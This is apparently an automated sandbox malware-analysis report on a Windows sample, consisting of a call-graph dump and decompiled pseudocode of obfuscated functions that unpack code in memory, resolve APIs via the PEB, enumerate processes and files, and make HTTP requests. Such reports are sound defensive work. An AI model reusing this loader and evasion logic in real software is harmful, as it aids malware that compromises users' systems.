33944->33941 33944->33942 33946 41ed76 __mtinitlocknum 33945->33946 33947 41ed8e 33946->33947 33957 41edad _memset 33946->33957 33948 41f8d2 __make__time64_t 67 API calls 33947->33948 33949 41ed93 33948->33949 33958 424e06 4 API calls 2 library calls 33949->33958 33951 41ee1f RtlAllocateHeap 33951->33957 33952 41eda3 __mtinitlocknum 33952->33941 33957->33951 33957->33952 33959 422e2d 68 API calls 2 library calls 33957->33959 33960 42367a 5 API calls 2 library calls 33957->33960 33961 41ee66 LeaveCriticalSection _doexit 33957->33961 33962 4260d0 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 33957->33962 33959->33957 33960->33957 33961->33957 33962->33957 33963 22d0000 33965 22d0005 33963->33965 33968 22d002d 33965->33968 33988 22d0456 GetPEB 33968->33988 33971 22d0456 GetPEB 33972 22d0053 33971->33972 33973 22d0456 GetPEB 33972->33973 33974 22d0061 33973->33974 33975 22d0456 GetPEB 33974->33975 33976 22d006d 33975->33976 33977 22d0456 GetPEB 33976->33977 33978 22d007b 33977->33978 33979 22d0456 GetPEB 33978->33979 33982 22d0089 33979->33982 33980 22d00e4 GetNativeSystemInfo 33981 22d0107 VirtualAlloc 33980->33981 33986 22d0029 33980->33986 33984 22d012f 33981->33984 33982->33980 33982->33986 33983 22d03b2 33990 22e25e0 33983->33990 33984->33983 33985 22d0388 VirtualProtect 33984->33985 33985->33984 33985->33986 33989 22d0045 33988->33989 33989->33971 33996 22e1000 33990->33996 33994 22e2615 ExitProcess 34000 22e1030 LoadLibraryW GetProcAddress 33996->34000 33999 22e14a0 9 API calls 33999->33994 34041 22e1b30 34000->34041 34003 22e10a3 34005 22e1b30 SetLastError 34003->34005 34004 22e1091 SetLastError 34037 22e102b 34004->34037 34006 22e10b9 34005->34006 34007 22e10de SetLastError 34006->34007 34008 22e10f0 34006->34008 34006->34037 34007->34037 34009 22e10ff SetLastError 34008->34009 34010 22e1111 34008->34010 34009->34037 34011 22e111c SetLastError 34010->34011 34013 22e112e GetNativeSystemInfo 34010->34013 34011->34037 34014 22e11bc 
34013->34014 34015 22e11e9 34014->34015 34016 22e11d7 SetLastError 34014->34016 34044 22e1800 VirtualAlloc 34015->34044 34016->34037 34017 22e1202 34018 22e123d GetProcessHeap RtlAllocateHeap 34017->34018 34045 22e1800 VirtualAlloc 34017->34045 34019 22e127b 34018->34019 34020 22e1257 SetLastError 34018->34020 34024 22e1b30 SetLastError 34019->34024 34020->34037 34021 22e1222 34021->34018 34022 22e122e SetLastError 34021->34022 34022->34037 34025 22e12fb 34024->34025 34032 22e1302 34025->34032 34046 22e1800 VirtualAlloc 34025->34046 34026 22e1320 34047 22e1b50 34026->34047 34029 22e136b 34029->34032 34053 22e21a0 34029->34053 34072 22e16c0 GetProcessHeap HeapFree VirtualFree 34032->34072 34034 22e13ca 34034->34032 34035 22e13eb 34034->34035 34036 22e13ff GetPEB 34035->34036 34035->34037 34036->34037 34037->33999 34042 22e1b3b SetLastError 34041->34042 34043 22e1070 34041->34043 34042->34043 34043->34003 34043->34004 34043->34037 34044->34017 34045->34021 34046->34026 34048 22e1b7d 34047->34048 34049 22e1b30 SetLastError 34048->34049 34051 22e1be9 34048->34051 34050 22e1c32 34049->34050 34050->34051 34073 22e1800 VirtualAlloc 34050->34073 34051->34029 34054 22e21dd IsBadHugeReadPtr 34053->34054 34055 22e13b5 34053->34055 34054->34055 34057 22e2207 34054->34057 34055->34032 34066 22e1e80 34055->34066 34057->34055 34058 22e224d 34057->34058 34059 22e2239 SetLastError 34057->34059 34074 22e1a20 VirtualQuery VirtualFree VirtualAlloc 34058->34074 34059->34055 34061 22e2267 34062 22e229d 34061->34062 34063 22e2273 SetLastError 34061->34063 34062->34055 34065 22e23ae SetLastError 34062->34065 34063->34055 34065->34055 34069 22e1eba 34066->34069 34067 22e1fe5 34068 22e1d10 2 API calls 34067->34068 34071 22e1fc1 34068->34071 34069->34067 34069->34071 34075 22e1d10 34069->34075 34071->34034 34072->34037 34073->34051 34074->34061 34076 22e1d29 34075->34076 34080 22e1d1f 34075->34080 34077 22e1d37 34076->34077 34078 22e1d9d VirtualProtect 34076->34078 34077->34080 34082 22e1820 
VirtualFree 34077->34082 34078->34080 34080->34069 34082->34080 34083 23041df 34088 23047eb 34083->34088 34085 23041e4 34123 2302f84 34085->34123 34122 2304809 34088->34122 34092 2304f62 34225 2305c4a GetPEB RtlFreeHeap RtlAllocateHeap 34092->34225 34099 2302fdf GetPEB RtlFreeHeap 34099->34122 34102 2304873 34102->34085 34115 230486e 34208 23060b0 GetPEB RtlFreeHeap RtlAllocateHeap 34115->34208 34121 2302f84 GetPEB 34121->34122 34122->34092 34122->34099 34122->34102 34122->34115 34122->34121 34129 23065d3 34122->34129 34135 2301191 34122->34135 34152 23067ed 34122->34152 34164 2304465 34122->34164 34176 2306c6b 34122->34176 34183 2304fac 34122->34183 34187 2305aa1 34122->34187 34193 2303b4e 34122->34193 34199 23025ec GetPEB RtlAllocateHeap 34122->34199 34200 23015c1 34122->34200 34209 23076e4 GetPEB RtlFreeHeap 34122->34209 34210 23062cf GetPEB 34122->34210 34211 2305fab GetPEB RtlFreeHeap RtlAllocateHeap 34122->34211 34212 2306168 GetPEB 34122->34212 34213 23058e8 GetPEB RtlFreeHeap RtlAllocateHeap 34122->34213 34214 23077b5 GetPEB RtlAllocateHeap 34122->34214 34215 2305186 GetPEB RtlAllocateHeap 34122->34215 34216 2304564 7 API calls 34122->34216 34217 23050b4 GetPEB RtlAllocateHeap 34122->34217 34218 2306435 GetPEB RtlFreeHeap RtlAllocateHeap 34122->34218 34219 2305c25 GetPEB 34122->34219 34220 230786e GetPEB RtlFreeHeap RtlAllocateHeap 34122->34220 34221 2305dd6 GetPEB RtlFreeHeap RtlAllocateHeap 34122->34221 34222 2306d1a GetPEB 34122->34222 34223 2303351 GetPEB 34122->34223 34224 23066ad GetPEB RtlFreeHeap RtlAllocateHeap 34122->34224 34124 2302f96 34123->34124 34125 2302fa4 34123->34125 34330 2302ec1 GetPEB 34124->34330 34127 2302f9b 34331 2302e2c GetPEB 34127->34331 34132 23065f0 34129->34132 34131 23066a0 34131->34122 34132->34131 34133 2302f84 GetPEB 34132->34133 34226 23032df 34132->34226 34233 2303390 GetPEB CreateToolhelp32Snapshot Process32FirstW Process32NextW FindCloseChangeNotification 34132->34233 34133->34132 34151 23011bc 34135->34151 34137 
23015ad 34274 2302fdf 34137->34274 34138 2302674 GetPEB RtlAllocateHeap 34138->34151 34141 23015b4 34141->34122 34143 2303037 GetPEB RtlAllocateHeap 34143->34151 34146 2302f84 GetPEB 34146->34151 34149 2302fdf GetPEB RtlFreeHeap 34149->34151 34151->34137 34151->34138 34151->34141 34151->34143 34151->34146 34151->34149 34234 2301b76 34151->34234 34242 230216d 34151->34242 34268 23018cf GetPEB RtlAllocateHeap 34151->34268 34269 2301992 GetPEB RtlFreeHeap RtlAllocateHeap 34151->34269 34270 2303810 GetPEB 34151->34270 34271 23041a0 GetPEB RtlFreeHeap RtlAllocateHeap 34151->34271 34272 23017f8 GetPEB 34151->34272 34273 2301616 GetPEB RtlFreeHeap RtlAllocateHeap 34151->34273 34154 2306808 34152->34154 34153 2303037 2 API calls 34153->34154 34154->34153 34155 2302f84 GetPEB 34154->34155 34156 2302f84 GetPEB 34154->34156 34157 2306943 34154->34157 34163 230697a 34154->34163 34292 2305667 GetPEB 34154->34292 34158 23068d8 OpenSCManagerW 34155->34158 34156->34154 34160 2302f84 GetPEB 34157->34160 34158->34154 34161 2306961 34160->34161 34291 2302473 6 API calls 34161->34291 34163->34122 34165 2304487 34164->34165 34166 2302f84 GetPEB 34165->34166 34167 23044ec 34165->34167 34168 23044a9 34165->34168 34166->34165 34167->34122 34293 230272c 34168->34293 34170 23044b3 34296 2303c56 34170->34296 34173 2302f84 GetPEB 34174 23044d8 34173->34174 34175 2302fdf 2 API calls 34174->34175 34175->34167 34178 2306c88 34176->34178 34177 2302f84 GetPEB 34180 2306cf2 CreateThread 34177->34180 34178->34177 34179 2302f84 GetPEB 34178->34179 34181 2303037 2 API calls 34178->34181 34182 2306d0e 34178->34182 34179->34178 34180->34178 34302 23069ed 34180->34302 34181->34178 34182->34122 34185 2304fc6 34183->34185 34184 2304f76 GetPEB RtlAllocateHeap LoadLibraryW 34184->34185 34185->34184 34186 230509e 34185->34186 34186->34122 34192 2305abb 34187->34192 34188 2302f84 GetPEB 34189 2305b95 CreateFileW 34188->34189 34190 2305bd3 34189->34190 34189->34192 34190->34122 34191 2302f84 GetPEB 34191->34192 
34192->34188 34192->34190 34192->34191 34195 2303b6e 34193->34195 34194 2303ba6 34194->34122 34195->34194 34196 2302f84 GetPEB 34195->34196 34197 2302f84 GetPEB 34195->34197 34196->34195 34198 2303bea GetNativeSystemInfo 34197->34198 34198->34195 34199->34122 34201 2303037 2 API calls 34200->34201 34203 23015cc 34201->34203 34202 2301612 34202->34122 34203->34202 34321 2301dec 34203->34321 34206 2301602 34206->34122 34207 2302fdf 2 API calls 34207->34202 34208->34102 34209->34122 34210->34122 34211->34122 34212->34122 34213->34122 34214->34122 34215->34122 34216->34122 34217->34122 34218->34122 34219->34122 34220->34122 34221->34122 34222->34122 34223->34122 34224->34122 34225->34102 34227 2302f84 GetPEB 34226->34227 34228 230330d 34227->34228 34229 2303346 34228->34229 34230 2302f84 GetPEB 34228->34230 34229->34132 34231 230332f QueryFullProcessImageNameW 34230->34231 34232 2302f84 GetPEB 34231->34232 34232->34229 34233->34132 34235 2301b93 34234->34235 34236 2302f84 GetPEB 34235->34236 34238 2301bdd 34235->34238 34240 2301bd1 34235->34240 34279 2303016 GetPEB 34235->34279 34280 2303037 34235->34280 34236->34235 34238->34151 34240->34238 34241 2302fdf 2 API calls 34240->34241 34241->34238 34243 230219b 34242->34243 34244 2302447 34243->34244 34246 2302f84 GetPEB 34243->34246 34247 2302432 34243->34247 34249 2302f84 GetPEB 34243->34249 34255 2302f84 GetPEB 34243->34255 34256 2303037 2 API calls 34243->34256 34257 2302f84 GetPEB 34243->34257 34259 2302f84 GetPEB 34243->34259 34261 2302f84 GetPEB 34243->34261 34264 2302f84 GetPEB 34243->34264 34267 2302fdf 2 API calls 34243->34267 34285 2303da2 GetPEB RtlAllocateHeap 34243->34285 34286 230212d GetPEB 34243->34286 34287 2302674 34243->34287 34290 230205a GetPEB RtlFreeHeap RtlAllocateHeap 34243->34290 34244->34151 34251 230231f HttpOpenRequestW 34246->34251 34250 2302f84 GetPEB 34247->34250 34253 23022c8 InternetConnectW 34249->34253 34250->34244 34254 2302fdf 2 API calls 34251->34254 34253->34243 34254->34243 34258 
23023da InternetOpenW 34255->34258 34256->34243 34257->34243 34260 2302fdf 2 API calls 34258->34260 34262 23021f7 InternetCloseHandle 34259->34262 34260->34243 34263 230225b ObtainUserAgentString 34261->34263 34262->34243 34263->34243 34266 23023aa HttpSendRequestW 34264->34266 34266->34243 34267->34243 34268->34151 34269->34151 34270->34151 34271->34151 34272->34151 34273->34151 34275 2302f84 GetPEB 34274->34275 34276 2302ff6 34275->34276 34277 2302f84 GetPEB 34276->34277 34278 2303011 RtlFreeHeap 34277->34278 34278->34141 34279->34235 34281 2302f84 GetPEB 34280->34281 34282 230304e 34281->34282 34283 2302f84 GetPEB 34282->34283 34284 2303066 RtlAllocateHeap 34283->34284 34284->34235 34285->34243 34286->34243 34288 2303037 2 API calls 34287->34288 34289 23026a8 34288->34289 34289->34243 34289->34289 34290->34243 34291->34163 34292->34154 34294 2303037 2 API calls 34293->34294 34295 230275e 34294->34295 34295->34170 34295->34295 34297 2302f84 GetPEB 34296->34297 34299 2303c82 34297->34299 34298 2303cd6 34298->34173 34299->34298 34300 2302f84 GetPEB 34299->34300 34301 2303cd3 GetVolumeInformationW 34300->34301 34301->34298 34303 2306a0f 34302->34303 34304 2306b66 34303->34304 34305 2302f84 GetPEB 34303->34305 34307 2306b64 34303->34307 34310 2306b8a 3 API calls 34303->34310 34311 2302f84 GetPEB 34303->34311 34308 2302f84 GetPEB 34304->34308 34306 2306b38 FindFirstChangeNotificationW 34305->34306 34312 2306b8a 34306->34312 34308->34307 34310->34303 34311->34303 34317 2306ba7 34312->34317 34313 2306c35 34316 2302f84 GetPEB 34313->34316 34314 2302f84 GetPEB 34314->34317 34315 2306c33 34315->34303 34318 2306c53 lstrcmpiW 34316->34318 34317->34313 34317->34314 34317->34315 34319 2302f84 GetPEB 34317->34319 34318->34315 34320 2306c1c QueryFullProcessImageNameW 34319->34320 34320->34317 34326 2301e00 34321->34326 34322 2302f84 GetPEB 34322->34326 34323 2302f84 GetPEB 34324 2301f5f CryptDecodeObjectEx 34323->34324 34324->34326 34325 2301fa1 34327 2302fdf 2 API calls 
34325->34327 34326->34322 34326->34323 34326->34325 34328 23015fe 34326->34328 34329 2303037 2 API calls 34326->34329 34327->34328 34328->34206 34328->34207 34329->34326 34330->34127 34331->34125 34332 401e30 34366 406041 34332->34366 34334 401e60 GetSystemMenu 34385 40deed 34334->34385 34336 401e75 34337 401fc6 SendMessageA SendMessageA 34336->34337 34340 402890 ctype 82 API calls 34336->34340 34338 402023 34337->34338 34339 402014 34337->34339 34342 40ca8b EnableWindow 34338->34342 34341 40ca8b EnableWindow 34339->34341 34343 401e8a 34340->34343 34344 402021 34341->34344 34342->34344 34345 40ddfe 111 API calls 34343->34345 34347 40203c 34344->34347 34348 40204e 34344->34348 34346 401e98 34345->34346 34350 401ea1 34346->34350 34353 402910 88 API calls 34346->34353 34349 40ca8b EnableWindow 34347->34349 34351 40ca8b EnableWindow 34348->34351 34352 40204c 34349->34352 34354 401eca AppendMenuA AppendMenuA 34350->34354 34355 401efb 34350->34355 34351->34352 34353->34350 34354->34355 34356 401d20 70 API calls 34355->34356 34357 401f1c 34356->34357 34358 401f20 GetProcAddress 34357->34358 34359 401f33 34357->34359 34358->34359 34360 401f3d GetProcAddress 34359->34360 34361 401a70 GetProcAddress GetProcAddress 34360->34361 34362 401f6d 34361->34362 34363 401f79 VirtualAlloc 34362->34363 34364 401f8c 34362->34364 34363->34364 34365 401f92 34364->34365 34365->34337 34367 406053 34366->34367 34368 40604b 34366->34368 34389 40c865 166 API calls ctype 34367->34389 34388 40c41c 162 API calls ctype 34368->34388 34371 406051 34372 406061 34371->34372 34391 4095e0 105 API calls 3 library calls 34371->34391 34390 405cf9 EndDialog 34372->34390 34375 406068 34375->34334 34376 406073 34376->34372 34377 406079 34376->34377 34392 40c907 113 API calls 34377->34392 34379 406083 34380 406089 34379->34380 34381 40609d 34379->34381 34393 405feb 111 API calls ctype 34380->34393 34381->34334 34383 40608e 34394 40ca4f ShowWindow 34383->34394 34395 40de79 111 API calls 3 library calls 
34385->34395 34387 40def4 34388->34371 34389->34371 34390->34375 34391->34376 34392->34379 34393->34383 34394->34381 34395->34387 34396 40b3b1 34423 41f71d 34396->34423 34398 40b3bd GetPropA 34399 40b487 34398->34399 34400 40b3e7 34398->34400 34401 409c97 112 API calls 34399->34401 34402 40b466 34400->34402 34403 40b3ec 34400->34403 34404 40b48f 34401->34404 34405 409c97 112 API calls 34402->34405 34406 40b3f1 34403->34406 34407 40b442 SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 34403->34407 34410 409c97 112 API calls 34404->34410 34411 40b46c 34405->34411 34408 40b4a5 CallWindowProcA 34406->34408 34409 40b3fc 34406->34409 34407->34408 34414 40b437 ~_Task_impl 34408->34414 34412 409c97 112 API calls 34409->34412 34413 40b497 34410->34413 34426 40b33b 120 API calls ctype 34411->34426 34416 40b402 34412->34416 34427 40b2c5 119 API calls 34413->34427 34424 4089e1 GetWindowRect GetWindowLongA 34416->34424 34418 40b47e 34420 40b4a1 34418->34420 34420->34408 34420->34414 34421 40b412 CallWindowProcA 34425 40a26c 147 API calls ctype 34421->34425 34423->34398 34424->34421 34425->34414 34426->34418 34427->34420 34428 40a3d5 34429 40a3e6 34428->34429 34435 40a3e1 34428->34435 34430 409cbe 111 API calls 34429->34430 34431 40a3f0 34430->34431 34432 40a40b DefWindowProcA 34431->34432 34433 40a3f9 34431->34433 34432->34435 34436 40a2e8 34433->34436 34437 40a2f4 __EH_prolog3_catch 34436->34437 34438 40f584 ctype 105 API calls 34437->34438 34439 40a303 34438->34439 34442 40a31a 34439->34442 34453 4037e3 2 API calls 4 library calls 34439->34453 34441 40a371 34448 4081dc 34441->34448 34442->34441 34454 4089e1 GetWindowRect GetWindowLongA 34442->34454 34445 40a39a ~_Task_impl 34445->34435 34456 409bf3 34448->34456 34450 408215 34450->34445 34455 40a26c 147 API calls ctype 34450->34455 34453->34442 34454->34441 34455->34445 34457 40f584 ctype 105 API calls 34456->34457 34458 409c05 34457->34458 34460 4080c3 2 API calls 34458->34460 34459 4081fe 34459->34450 34461 
4080c3 34459->34461 34460->34459 34462 4080f2 CallWindowProcA 34461->34462 34464 4080d0 34461->34464 34463 408105 34462->34463 34463->34450 34464->34462 34465 4080de DefWindowProcA 34464->34465 34465->34463 34466 4099f5 34467 409a22 34466->34467 34468 4099fe GetModuleHandleA 34466->34468 34468->34467 34469 409a0e LoadLibraryA 34468->34469 34469->34467 34470 2303686 34479 23036a2 34470->34479 34471 2302f84 GetPEB 34473 230376c Process32NextW 34471->34473 34472 230378c 34474 2302f84 GetPEB 34472->34474 34473->34479 34475 23037a1 FindCloseChangeNotification 34474->34475 34477 230378a 34475->34477 34476 2302f84 GetPEB 34478 230373a Process32FirstW 34476->34478 34478->34479 34479->34471 34479->34472 34479->34476 34479->34477 34480 2302f84 GetPEB 34479->34480 34481 23036f1 CreateToolhelp32Snapshot 34480->34481 34481->34477 34481->34479 34482 403afd 34483 403b0b 34482->34483 34486 403a3a 34483->34486 34487 403af5 34486->34487 34489 403a6e 34486->34489 34488 403a6f RegOpenKeyExA 34488->34489 34489->34487 34489->34488 34490 403a8c RegQueryValueExA 34489->34490 34491 403ade RegCloseKey 34489->34491 34490->34489 34491->34489

                                                      Executed Functions

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(022E4054,022E4040), ref: 022E1047
                                                      • GetProcAddress.KERNEL32(00000000), ref: 022E104E
                                                        • Part of subcall function 022E1B30: SetLastError.KERNEL32(0000000D,?,022E1070,?,00000040), ref: 022E1B3D
                                                      • SetLastError.KERNEL32(000000C1), ref: 022E1096
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                      • String ID:
                                                      • API String ID: 1866314245-0
                                                      • Opcode ID: 4522218bb593ac208d7f70df3b51fd8836bb3b0be9fba2ca95531e3a30a55776
                                                      • Instruction ID: 1946cf4ce3add3ce5b42a34c22e761c02035915234359ad41969f33bbb089c75
                                                      • Opcode Fuzzy Hash: 4522218bb593ac208d7f70df3b51fd8836bb3b0be9fba2ca95531e3a30a55776
                                                      • Instruction Fuzzy Hash: D7F1E6B4E10209EFDF04DF94D984AAEB7B1AF48304F5085A8E90AAB345D770EE51DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E00403F0B(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, int _a4) {
                                                      				signed int _v8;
                                                      				char _v284;
                                                      				char _v288;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t9;
                                                      				struct HINSTANCE__* _t12;
                                                      				intOrPtr* _t18;
                                                      				intOrPtr _t26;
                                                      				void* _t27;
                                                      				intOrPtr _t33;
                                                      				signed int _t34;
                                                      				intOrPtr _t35;
                                                      				signed int _t36;
                                                      				void* _t37;
                                                      
                                                      				_t33 = __edi;
                                                      				_t32 = __edx;
                                                      				_t28 = __ecx;
                                                      				_t26 = __ebx;
                                                      				_t9 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t9 ^ _t36;
                                                      				_t39 = _a4 - 0x800;
                                                      				_t35 = __ecx;
                                                      				if(_a4 != 0x800) {
                                                      					_t12 = GetLocaleInfoA(_a4, 3,  &_v288, 4); // executed
                                                      					__eflags = _t12;
                                                      					if(__eflags != 0) {
                                                      						goto L2;
                                                      					} else {
                                                      					}
                                                      				} else {
                                                      					_push(E0041FC1E(__edx,  &_v288, 4, "LOC"));
                                                      					E00402F17(__ebx, _t28, __edi, _t35);
                                                      					_t37 = _t37 + 0x10;
                                                      					L2:
                                                      					_push(_t26);
                                                      					_push(_t33);
                                                      					_t34 =  *(E0041F8D2(_t39));
                                                      					 *(E0041F8D2(_t39)) =  *_t14 & 0x00000000;
                                                      					_t35 = 0x112;
                                                      					_t27 = E0041FC9F( &_v284, 0x112, 0x111, 0x112,  &_v288);
                                                      					_t18 = E0041F8D2(_t39);
                                                      					_t40 =  *_t18;
                                                      					if( *_t18 == 0) {
                                                      						 *(E0041F8D2(__eflags)) = _t34;
                                                      					} else {
                                                      						E004031BC( *((intOrPtr*)(E0041F8D2(_t40))));
                                                      					}
                                                      					if(_t27 == 0xffffffff || _t27 >= _t35) {
                                                      						_t12 = 0;
                                                      						__eflags = 0;
                                                      					} else {
                                                      						_t12 = LoadLibraryA( &_v284); // executed
                                                      					}
                                                      					_pop(_t33);
                                                      					_pop(_t26);
                                                      				}
                                                      				return E0041E5DF(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
                                                      			}


















                                                      APIs
                                                      • _strcpy_s.LIBCMT ref: 00403F38
                                                        • Part of subcall function 00402F17: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 00402F17: __EH_prolog3.LIBCMT ref: 00403804
                                                        • Part of subcall function 0041F8D2: __getptd_noexit.LIBCMT ref: 0041F8D2
                                                      • __snprintf_s.LIBCMT ref: 00403F71
                                                        • Part of subcall function 0041FC9F: __vsnprintf_s_l.LIBCMT ref: 0041FCB4
                                                      • GetLocaleInfoA.KERNELBASE(00000800,00000003,?,00000004), ref: 00403F9C
                                                      • LoadLibraryA.KERNELBASE(?), ref: 00403FBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                      • String ID: LOC
                                                      • API String ID: 4018564869-519433814
                                                      • Opcode ID: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
                                                      • Instruction ID: a958a6fff790820a8ed6774035e13ca5e81909a58661fe9e0dffe607a1d70840
                                                      • Opcode Fuzzy Hash: 124329ac7b5173beeb4f80da07e0245dcef33f898aea0afbead4e6b8adcc6ca7
                                                      • Instruction Fuzzy Hash: D811A8719102086AD714BF61CC46BDE36BCAF01719F1000B7B504BB1D1EB7C9E9A8B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E02303686(intOrPtr* __ecx, void* __edx) {
                                                      				void* _v556;
                                                      				void* _v560;
                                                      				void* _t6;
                                                      				int _t9;
                                                      				int _t11;
                                                      				signed int _t13;
                                                      				signed int _t15;
                                                      				signed int _t17;
                                                      				void* _t20;
                                                      				intOrPtr* _t21;
                                                      				void* _t36;
                                                      				void* _t37;
                                                      
                                                      				_t37 = _v560;
                                                      				_t21 = __ecx;
                                                      				_t36 = __edx;
                                                      				_t6 = 0xf9a9043;
                                                      				do {
                                                      					while(_t6 != 0xf5e4533) {
                                                      						if(_t6 == 0xf9a9043) {
                                                      							_t6 = 0x2b8fd175;
                                                      							continue;
                                                      						}
                                                      						if(_t6 == 0x200a1826) {
                                                      							E02302F84(0xf568ce83, 0x2e998fdc, 0x167);
                                                      							_t11 = FindCloseChangeNotification(_t37); // executed
                                                      							return _t11;
                                                      						}
                                                      						if(_t6 == 0x2495f148) {
                                                      							_v556 = 0x22c;
                                                      							_t13 = E02302F84(0xf568ce83, 0x16cdffc9, 6);
                                                      							Process32FirstW(_t37,  &_v556); // executed
                                                      							asm("sbb eax, eax");
                                                      							_t15 =  ~_t13 & 0x05a167eb;
                                                      							L10:
                                                      							_t6 = _t15 + 0x200a1826;
                                                      							continue;
                                                      						}
                                                      						if(_t6 == 0x25ab8011) {
                                                      							_t17 =  *_t21( &_v556, _t36);
                                                      							asm("sbb eax, eax");
                                                      							_t15 =  ~_t17 & 0xef542d0d;
                                                      							goto L10;
                                                      						}
                                                      						if(_t6 != 0x2b8fd175) {
                                                      							goto L16;
                                                      						}
                                                      						E02302F84(0xf568ce83, 0xb1495a04, 0x1ec);
                                                      						_t20 = CreateToolhelp32Snapshot(2, 0); // executed
                                                      						_t37 = _t20;
                                                      						if(_t37 != 0xffffffff) {
                                                      							_t6 = 0x2495f148;
                                                      							continue;
                                                      						}
                                                      						return _t20;
                                                      						L20:
                                                      					}
                                                      					E02302F84(0xf568ce83, 0xb8b5c52a, 0x1e0);
                                                      					_t9 = Process32NextW(_t37,  &_v556); // executed
                                                      					if(_t9 == 0) {
                                                      						_t6 = 0x200a1826;
                                                      						goto L16;
                                                      					} else {
                                                      						_t6 = 0x25ab8011;
                                                      						continue;
                                                      					}
                                                      					goto L20;
                                                      					L16:
                                                      				} while (_t6 != 0x14c42a61);
                                                      				return _t6;
                                                      			}















                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023036F2
                                                      • Process32FirstW.KERNEL32(?,?), ref: 0230373B
                                                      • Process32NextW.KERNEL32(?,?,00000000,?,?,?), ref: 0230376D
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 023037A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true
                                                      • Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp
                                                      • Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3243318325-0
                                                      • Opcode ID: 43dfefde8e68e6bc9e6e3de67243cdd9adc619014dcdd61889de87363c02cb4b
                                                      • Instruction ID: 8a11a2d8bb9a2a885b9d7371dc600ead8b0cd83fd3c0add721a1678e15b152df
                                                      • Opcode Fuzzy Hash: 43dfefde8e68e6bc9e6e3de67243cdd9adc619014dcdd61889de87363c02cb4b
                                                      • Instruction Fuzzy Hash: EC219B6138421657E63865F89CF8F7B6199CF94AA8F240956BD12CB3C0CB29DD45C2B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E023028FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				short _v524;
                                                      				char _v1044;
                                                      				short _v1588;
                                                      				short _v1590;
                                                      				struct _WIN32_FIND_DATAW _v1636;
                                                      				void* _v1640;
                                                      				void* _t21;
                                                      				void* _t22;
                                                      				int _t28;
                                                      				signed int _t31;
                                                      				signed int _t33;
                                                      				signed int _t35;
                                                      				void* _t47;
                                                      				void* _t48;
                                                      				void* _t50;
                                                      				void* _t75;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      
                                                      				_t75 = _v1640;
                                                      				_t48 = __edx;
                                                      				_t78 = __ecx;
                                                      				_t21 = 0xe3051c;
                                                      				while(1) {
                                                      					L1:
                                                      					_t50 = 0x2e;
                                                      					do {
                                                      						L2:
                                                      						while(_t21 != 0xe3051c) {
                                                      							if(_t21 == 0x57934ae) {
                                                      								_t22 = E02302674(0x2309190);
                                                      								_push(_t78);
                                                      								_t76 = _t22;
                                                      								_push(_t22);
                                                      								_push(0x104);
                                                      								_push( &_v524);
                                                      								 *((intOrPtr*)(E02302F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      								_t79 = _t79 + 0x10;
                                                      								E02302FDF(_t76);
                                                      								_t21 = 0x3a3f7db0;
                                                      								while(1) {
                                                      									L1:
                                                      									_t50 = 0x2e;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t21 == 0xfc52714) {
                                                      								E02302F84(0xf568ce83, 0xdc33dcc3, 0x19d);
                                                      								_t28 = FindClose(_t75); // executed
                                                      								return _t28;
                                                      							}
                                                      							if(_t21 == 0x29ccb448) {
                                                      								E02302F84(0xf568ce83, 0xab7da153, 0x55);
                                                      								_t31 = FindNextFileW(_t75,  &_v1636); // executed
                                                      								asm("sbb eax, eax");
                                                      								_t33 =  ~_t31 & 0x1aaf748c;
                                                      								L19:
                                                      								_t21 = _t33 + 0xfc52714;
                                                      								while(1) {
                                                      									L1:
                                                      									_t50 = 0x2e;
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      							if(_t21 == 0x2a749ba0) {
                                                      								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                      									_t35 = _a4( &_v1636, _a8);
